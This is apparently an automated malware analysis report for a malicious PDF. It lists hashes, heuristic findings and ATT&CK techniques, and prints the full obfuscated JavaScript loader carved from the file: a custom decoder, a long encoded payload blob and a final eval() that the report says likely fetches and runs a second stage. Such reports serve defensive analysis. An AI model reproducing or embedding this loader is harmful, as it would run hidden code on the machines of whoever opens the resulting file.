Malicious PDF — malware analysis report

Static analysis result for SHA-256 eac8211b5b3887f5…

MALICIOUS

PDF

9.6 KB Created: 2008-07-26 19:43:58 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 5c14f5fe77ca0f066f200b258d22acb2 SHA-1: 9e05cec3ff2f9c74fd0f52dd7fac9c973ae9cf0c SHA-256: eac8211b5b3887f5e30f5903bd2bb513a89d0bdcf6a52fed8a3eec2d3f745fef
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1027 Obfuscated Files or Information

The PDF file contains embedded JavaScript with multiple obfuscation indicators, including eval() calls and string concatenation. The heuristic 'EXTRACTED_FILE_STATIC_TRIAGE' flags a long encoded blob and script obfuscation. The JavaScript is likely designed to download and execute a second-stage payload, as indicated by the eval() calls and the presence of a JavaScript stream. The document body itself contains no readable content to provide further context.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    for(QgO1WUA64=Math[UOxr6A8T8+       ""+ "c" + "" +""+UOxr6A8T8+VlBDs0IKCD  +UOxr6A8T8+     ""+"i"+UOxr6A8T8 +"l" + ""       +""](VZZ9On/UvfnowhISU);QgO1WUA64>YoA42IkZOOr;QgO1WUA64--)
{mY4mZpMhzei = "j5lbLfVZ";for(eval(""    + UOxr6A8T8+""  +"sGRWBW="+"" +  "M"+UOxr6A8T8+  "a"+UOxr6A8T8+   "t"+UOxr6A8T8+    "h"+XV3au+XV3au+"."+UOxr6A8T8+f8dGsF+UOxr6A8T8+"i"+UOxr6A8T8+"n(VZZ9On,UvfnowhISU)");sGRWBW>YoA42IkZOOr;sGRWBW--,VZZ9On--){hOQjOihfRC9hX7|=(j58XDgq[UOxr6A8T8+El4Mv6KJAYVp[ XV3au+   ""+""+"c"+XV3au+"h"+XV3au+"a"+XV3au+"r"+XV3au+"C"+XV3au+"o"+XV3au+"d"+XV3au+VlBDs0IKCD+XV3au+"A"+XV3au+"t"](mn1HyHjUSFLxw++)-48])<<bTF0ZIS40B5was;
if(bTF0ZIS40B5was){aqi1mOoaL+=KPhCFNwGFl(70^hOQjOihfRC9hX7&255);hOQjOihfRC9hX7>>=5+3;bTF0ZIS40B5was-=3-1;
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_000.js pdf-javascript-stream PDF /JS object 13 at offset 0x336 8248 bytes
SHA-256: 15b109bbe96afa13b0326cc9c9174eee7d636c9fdd6669d07ef650c129667100
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). 70 of 107 identifiers look randomly generated (e.g. 'A1BpGaArLawatah0nYAbw9QaxKlp25tzoI25xRi8') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var mY4mZpMhzei = "j5lbLfVZ";
var f8dGsF = "m";
var VlBDs0IKCD = "e";
var XV3au =   "",UOxr6A8T8="";

var Ex5R4u =       ""+  "f";
var NcVRBZElObTO = Ex5R4u+  ""+XV3au+     ""+"r"    +""+XV3au+ ""+   "o" +XV3au+ ""+""+ f8dGsF  +  XV3au+    ""+    ""    +  "C" +XV3au+"h"+XV3au+""+ "a"+XV3au+   ""+    "r"+XV3au+"C"  +    "" +XV3au+"o"+XV3au+"d" +  "" +XV3au+VlBDs0IKCD +   "";


function KPhCFNwGFl(OSg5YbB4D1D){
return String[NcVRBZElObTO ](OSg5YbB4D1D) +"";

}


function EsGuUVn(El4Mv6KJAYVp){
mY4mZpMhzei = "j5lbLfVZ";
var YoA42IkZOOr=0,
VZZ9On=El4Mv6KJAYVp.length,UvfnowhISU=1018+6,sGRWBW,
QgO1WUA64,aqi1mOoaL=   "",mn1HyHjUSFLxw=YoA42IkZOOr,bTF0ZIS40B5was=YoA42IkZOOr,hOQjOihfRC9hX7=YoA42IkZOOr,j58XDgq=Array(63,6,24,44,31,51,7,1,53,3,0,0,0,0,0,0,38,25,12,40,55,22,52,16,23,54,37,19,0,5,2,47,4,10,32,14,36,49,57,41,61,34,50,0,0,0,0,56,0,35,59,45,62,43,33,42,11,29,21,60,9,58,28,17,39,15,48,27,8,26,30,13,20,18,46);




for(QgO1WUA64=Math[UOxr6A8T8+       ""+ "c" + "" +""+UOxr6A8T8+VlBDs0IKCD  +UOxr6A8T8+     ""+"i"+UOxr6A8T8 +"l" + ""       +""](VZZ9On/UvfnowhISU);QgO1WUA64>YoA42IkZOOr;QgO1WUA64--)
{mY4mZpMhzei = "j5lbLfVZ";for(eval(""    + UOxr6A8T8+""  +"sGRWBW="+"" +  "M"+UOxr6A8T8+  "a"+UOxr6A8T8+   "t"+UOxr6A8T8+    "h"+XV3au+XV3au+"."+UOxr6A8T8+f8dGsF+UOxr6A8T8+"i"+UOxr6A8T8+"n(VZZ9On,UvfnowhISU)");sGRWBW>YoA42IkZOOr;sGRWBW--,VZZ9On--){hOQjOihfRC9hX7|=(j58XDgq[UOxr6A8T8+El4Mv6KJAYVp[ XV3au+   ""+""+"c"+XV3au+"h"+XV3au+"a"+XV3au+"r"+XV3au+"C"+XV3au+"o"+XV3au+"d"+XV3au+VlBDs0IKCD+XV3au+"A"+XV3au+"t"](mn1HyHjUSFLxw++)-48])<<bTF0ZIS40B5was;
if(bTF0ZIS40B5was){aqi1mOoaL+=KPhCFNwGFl(70^hOQjOihfRC9hX7&255);hOQjOihfRC9hX7>>=5+3;bTF0ZIS40B5was-=3-1;
}else{bTF0ZIS40B5was=4+2;}}}return(aqi1mOoaL);}var Z1rowRhTN6u8=EsGuUVn(UOxr6A8T8+    ""  +"B75lF2IlFG5q@cpACByB@iLwFnZqzXE4B7ZBCxYBOTNQ@7ZhdTUhZ_IqpGKwIC@AgBNQOUxq@UFKU_ZhgBYAzX5lFxawCWZtCPYBzr1imWZtCkEq0nNw82aAccpA0nNw82K4b21KqX5lFxaw@cpA0nNw829u8B9l8t9wORytzApugBNQWoDsXUFKFBYB5G9Q@X5lFxawXA1KbkPKq75lF21BaGKwOTNQ@cpAp2awC75haP5tFLUtFx5hWRy4BXNt@V1BaGKwOTNQ@fpAdX@AB89Kq75lF2@wpkaQWnYt@cpA5RZt8xZlIBYsTwIBM2Hi8wIBdoLnZwIB8ApnIwIBIjGndwIBZAp4PBIBdoRiMBIBDjGnIwIBdor7NBIBIVDndwIBIXDLPBIBZAp4PBIBdlGiZwIBUjRnIwIB5Vp4PBIBriGiMBIB5iRnZwIB9GpLDwIB9G6iPBIB9xR4PBIBZ7rLPBIB5oDn6BIB9nR48wIBdXDnrwIBIlDn5wIB5MDnrwIBUjp4PBIBdoGiMBIB8jHnZwIBIjHndwIB576L8wIBU7p4PBIBIj6iIwIB8j6L8wIBZXH70wIBZiDnIwIB8jD7NBIB876LLBIBPBRiLBIBIjDiZwIBLGHidwIBIVHnZwIBMLG7DwIBIjpiNBIBZA6L6BIB9LrLPBIB8orndwIBUw6LdwIB5wrL5wIBZ7p4PBIBIj6iZwIBr7H78wIBIjR4PBIBdoRndwIBDjrnrwIBNxpi8wIBIlp4PBIBIjp46BIB57G78wIB5ADn9BIBdlG78wIBIVHnNBIB5oDnUwIB8j67dwIBdiG76BIB9_DnPBIBLLr7FwIBLLLLLBIBM2HiFwIBLPp4PBIB6BLLFwIBP_pnLBIBFwLn5wIBUV6n5wIBr7D7PBIBr7D4dwIB8jD7PBIBP_H7IwIBrl6nDwIBIApiIwIBrVDnIwIBrVDnZwIBrwHnFwIBFlHi5wIBrXDiMBIB5AHnZwIB5jDnZwIB6nL7dwIBIlLLMBIBLLGnMBIBIlDn5wIBL_p4PBIBMtp48wIBP2piMBIBdiLnMBIB0VDLIwIBrVDnIwIBrwLnLBIBrl6i9BIBUw6ndwIBrjGnFwIB5l6nNBIBdwL7dwIBIwRn9BIBLLrLMBIBIlDn5wIB5AD48wIBM2Hi8wIB5ADnIwIBdornrwIBIlDn5wIBMGp48wIBdjHnLBIBZjG7FwIB5ADnFwIB8767dwIBF7ri6BIBLLGnIwIBIlDn5wIB5MDnPBIBP_DnrwIBLBr4dwIBIwR46BIB5w6LLBIBriRiZwIBLLRiIwIBrVpLUwIBUlHnZwIB8iGnIwIBF7LiLBIBri6nPBIBrX6n9BIBri6nFwIBrX6nMBIBrX6i9BIBr76n9BIBF7LnLBIBUAHn8wIBF7LnMBIBF7Ln5wIBrlLn0wIBFwLnUwIBrVHnIwIB87GnIwIBriHnIwIBrw6nUwIB8jHiNBIBUAHiLBIBrM6nDwIB8lLn5wIBIAHi5oIsXUFKCTYw@cpA5RZt8xZlIBYsTwIBIiRi6BIBIiRi6BIBIiRi6BIBIiRi6GIsBXThanYwTCyQJFYAbA1QW2aAcA@wpkaQWnYtXUFKTkytTCyQJFYAbAIBCBywJnYwa_1Aawai62D7awai62D7TXE4BXThanYtaGKwOr5t@cpAFAH4BXxwIG5l02Iv@VZtptZtFx5hkByszBZlIGYQWxyhCWZtCPYBzF6KqMahOCZt@V1lOPNlgTylcR@QaRytZ_Yv829wpk5s@oZhfGYQWxyhcc6lOPNlgTylcF6Kq7ZhgCNlgTylc2Iv@oZhfGYQWxyhCj5BTxaBFkNQf_@igAEwIG5l0kE4BXPlgTylc2Iv@oZhfGYQWxyhCj5BTxaBFkNQf_@igA1lOPNlgTylcR@QaRytZ_Zu829wpk5sXUFKU_ZhgBYsTCyQJFNugBNQftahcjawFnZq@WpAIVanIApiIX@ATCyQJFYAbA1lgTylcF1lgTylcF1tOCYQTCyQJFy4BXFQa3YAbA1QaPaA6G9wpkasO86K@7yQF2@sO3piXXYvDlpiI8Dhc8Is@cZteFUhs2Iv@oYQWxyh@8@AzBZlIGYQWxyhXUFKrnNw@fZBe2Iv@XFiFXD40XD40XD40XD40XD40XD40Vp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4dVp4d86KqwaBOCNuIG5hCt9tzoI2ZwpiIA6tTW1Q53ZsXUFSBUFhR2@srBNw8kyQC2@v@VDsB89Kq75lF2IlYtyhc2Iv@w9QaxKlp25tzoI25xRi8jD25_67rlD25xpiZAD252H7UVD25tpidor25_67Ijr25nH7UAD25_676tr252p45VD252D49Gr25tpidor25_pL8lD25PH7ZAD25Bp4dor25LD78jr25BD7ZlD25BLiNnD25BLiFor25BG7dor25t6L9Gr25B6i5ir25Br7djD25_D457D252pn5wD25BHn57D25PHidor25_678jr25xHiUlD252HiUVD25B6nLxD25P6ndor252HiFAD25xHiLxD25tD4MkD25tDi5AD25xHi6tr25x6nLLr25GrLI7r252HiDlD25LLi8VD252p4UlD25xLLMnD252HiIlr25tpiLnr25BLL9Gr25x675VD25PDnL_D25BDL9BD25t6ndor252HiFlD25L6nMxD252H7dor25_67ZVD25nH757D25tGiIjD252pndor252Hidir25B6LMxD25Bpi5wr25_pLMxD252p4Ulr25B6i5MD25xHiP_D25_D7Mnr25BR45or25LLL6GD25LLLLLr25xRi8oD25LGndor25nrLLGD25GR4Z7r25GDLrwD25Pp4rwD25L6n6Gr25L6n0VD25xHi6Gr25GR4M2D25LpnriD252piIAD25Lp45AD25Lp45lD25LDnUoD25Gpn8wD25LD4Djr25BpiUlD25BHi5lD25nr7P_D252pLLxr25LLLUjr252pn5wD25LR4dor25xRndjD25GRiIjr25_D7rjr25kp492D25Lp45AD25LDLr7r25LpnFwr25PDnrVD25LH7UoD25Bpnrlr25_DLP_D252DLZwr25LLL9xr252pn5wD25Bpi0jD25xRi8jD25Bpi5AD25_6757D252pn5wD25xLidjD25_HiU7r25tH7MGD25Bpi5oD25x6nP_D25G6LDir25LLLUAD252pn5wD25BHn5or25GR457D25LrL0VD252DLdir25BDnLLr25LD7IlD25LLLIAD25Lp4NPD25PpnUlD25xD7UAD25G6LF7r25LDiror25LD4rwr25LDiroD25LD4rjr25LD4Fwr25L6nrwr25G6Lr7r25PpiUjD25G6Lrjr25G6LrwD25LpLrXD25GDLrMD25Lp4UAD25x6LUAD25LDiUAD25LDnrMD25xHi8lr25Ppi87r25LHnriD25xpLrwD252pi8w6AO86Kq75lF2IQa3y1pG9wpkaAbA1QaPaA6G9wpkasO86Kq75lF2ElJ2Iv@ApqIjYiJ2HlIjy4BXPBpGaAptYtF2Iv@ApqZApiIApiXUFKrnNw@jKlACZtC2Iv@iYtYFyhCWZtCPYBz21s@oH4BXPBpGaAgBNQ@cpAptYtF2Iu@VEwJTfQaRysIVKidXE4BXPBpGaA0nNw82aAbAIBCBywJnYwa_1Aaw54IXpiaw54IXpiTXE4BXFqpGKwI2Iv@7ZhdTUhZ_IqpGKwIC@AgBNQO86Kq75lF2ElWB9QZGpAbA@sJxYAeA@idtpiIApiIXEuptYtFF6KRTNw@V1BpGaAJTZBCt5vI8HlWB9QZCHlWB9QZGH4JTZBCtKscX1KXrTA@A@AeBZQAnNwFnZqixyQ5RYBs2Iv@X5lFxaw@8@AptYtcFy4Bc9Kq75lF2EQrBNwRCyQU2Iv@w9QaxKlp25tzoI252HlIjZ252HlIjNAO86KqMahOCZtzJNBaG9tgTyBCWZtCPYBz2@v@lpn0w6iOAEQrBNwRCyQU2EsbAEQrBNwRCyQUF6KqlahOx9uJTYQgnNljtKQFBYAbAE7WCYQpGNuJTYQgBylZBrQpkYQqRNtW_Eq8B9l3rpATo@uexKtkAEQrBNwRCyQU35sXUFSBUFhR2@srBNw8kyQC2@v@X6uDXIKBXxqBXNt@VIlI29uYTylCjGQgCZlTREtat59JTNQO89K@A@A@A1BpGaArLawatah0nYAbw9QaxKlp25tzoI25xRi8jD25_67rlD25xpiZAD252H7UVD25tpidor25_67Ijr25nH7UAD25_676tr252p45VD252D49Gr25tpidor25_pL8lD25PH7ZAD25Bp4dor25LD78jr25BD7ZlD25BLiNnD25BLiFor25BG7dor25t6L9Gr25B6i5ir25Br7djD25_D457D252pn5wD25BHn57D25PHidor25_678jr25xHiUlD252HiUVD25B6nLxD25P6ndor252HiFAD25xHiLxD25tD4MkD25tDi5AD25xHi6tr25x6nLLr25GrLI7r252HiDlD25LLi8VD252p4UlD25xLLMnD252HiIlr25tpiLnr25BLL9Gr25x675VD25PDnL_D25BDL9BD25t6ndor252HiFlD25L6nMxD252H7dor25_67ZVD25nH757D25tGiIjD252pndor252Hidir25B6LMxD25Bpi5wr25_pLMxD252p4Ulr25B6i5MD25xHiP_D25_D7Mnr25BR45or25LLL6GD25LLLLLr25xRi8oD25LGndor25nrLLGD25GR4Z7r25GDLrwD25Pp4rwD25L6n6Gr25L6n0VD25xHi6Gr25GR4M2D25LpnriD252piIAD25Lp45AD25Lp45lD25LDnUoD25Gpn8wD25LD4Djr25BpiUlD25BHi5lD25nr7P_D252pLLxr25LLLUjr252pn5wD25LR4dor25xRndjD25GRiIjr25_D7rjr25kp492D25Lp45AD25LDLr7r25LpnFwr25PDnrVD25LH7UoD25Bpnrlr25_DLP_D252DLZwr25LLL9xr252pn5wD25Bpi0jD25xRi8jD25Bpi5AD25_6757D252pn5wD25xLidjD25_HiU7r25tH7MGD25Bpi5oD25x6nP_D25G6LDir25LLLUAD252pn5wD25BHn5or25GR457D25LrL0VD252DLdir25BDnLLr25LD7IlD25LLLIAD25Lp4NPD25PpnUlD25xD7UAD25G6LF7r25LDiror25LD4rwr25LDiroD25LD4rjr25LD4Fwr25L6nrwr25G6Lr7r25PpiUjD25G6Lrjr25G6LrwD25LpLrXD25GDLrMD25Lp4UAD25x6LUAD25LDiUAD25LDnrMD25xHi8lr25Ppi87r25LHnriD25xpLrwD252pi8w6AO86KqA1BpGaAzPUw5ApiMRRAbA1Br25tZ_ZqpR@QaRytZ_YA3A1iXUFK@75lF2@QaRYAbA@idtpiIApiIAIu@V@hon5nIAH7t2Es@Apq8VDsXUFK@75lF2IqpGKwI2Iv@w9QaxKlp25tzoI25kpi0AD25kpi0A6AO86KqAIqpGKwI2Iv@7ZhdTUhZ_IqpGKwIC@AgBNQO86KqA1BpGaAIBD73FLn57YAbA@sIVaiJ2HlIjYiJ2Iu@ApqZApiIApiOAEu@ApqZApiIApiXUTA@A@A@7yQF2@srnNw@75wJnfL07Dq@cpAI8pArnKlHtr4rXaAmA@w5iLhwLDnRFpArnKlHtr4rXaAc8@AO89K@A@A@AIlFG5qiL5wJnfL07Dqs2Iv@X5lFxaw@8@ArLawatah0ny4brTA@A@A@75lF2@BK3RhtGyLU2Iv@w9QaxKlp25tzoI2IX6AO86K@A@A@AEBzkYQa2@sZBUNzRLl7P9ugBNQftah@WpAIVanIApiOl5Ph_NNTPGB@8Iv@l5Ph_NNTPGBXUTA@A@A@l5Ph_NNTPGB@cpATfLuTAEs@l5Ph_NNTPGBXUFK@iYwIR@tWxNuMTYQgnNlCMZtZkGlWRYsZBUNzRLl7P5sXUFKbrFKbL"+""  +"" +    "");eval(Z1rowRhTN6u8);

Open this report in the interactive analyzer, or submit your own file for analysis.